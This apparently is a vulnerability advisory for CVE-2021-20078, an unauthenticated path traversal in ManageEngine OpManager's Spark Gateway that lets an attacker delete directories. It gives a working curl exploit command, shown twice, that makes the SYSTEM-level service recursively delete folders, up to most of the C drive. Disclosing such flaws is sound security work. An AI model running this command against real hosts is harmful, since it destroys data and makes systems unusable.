ManageEngine OpManager Remote Directory Deletion

ManageEngine OpManager Remote Directory Deletion (CVE-2021-20078)

This is an unauthenticated path traversal remote directory deletion vulnerability in ManageEngine OpManager build 125346. The flaw exists in the Spark Gateway component in ManageEngine OpManager due to improper validation of user-supplied data prior to a directory deletion operation:

The vulnerability can be exploited with the following CURL command where the recordingFile is controlled via the 'server' URL parameter:

curl -i -H 'Sec-WebSocket-Key: dZ5/5knh6Tky32w9JDXbDQ==' -H 'Sec-WebSocket-Version: 13' -H 'Upgrade: websocket' 'http://<opmanager-host>:7275/RDP?server=../../../../../../../../<folder_to_be_deleted>/AAA&width=1440&height=788'

The recordingFile and the containing directory don't get deleted because the recordingFile is in use at the time of deletion. However, other files and sub-directories under the recordingFile's containing directory can be deleted. For example, if server=../../../../../../../../AAA is used, a file named C:\AAA.rdpv will be created on a Windows-based OpManager host and the OpManager (which runs as SYSTEM) will attempt to delete the entire C drive recursively. Although C:\AAA.rdpv will not be deleted, other files and sub-directories under C:\ can be deleted. This will not only delete some (deletable) OpManager files (i.e., DoS) but also cause the entire host in an unstable/unusable state.

curl -i -H 'Sec-WebSocket-Key: dZ5/5knh6Tky32w9JDXbDQ==' -H 'Sec-WebSocket-Version: 13' -H 'Upgrade: websocket' 'http://<opmanager-host>:7275/RDP?server=../../../../../../../../<folder_to_be_deleted>/AAA&width=1440&height=788'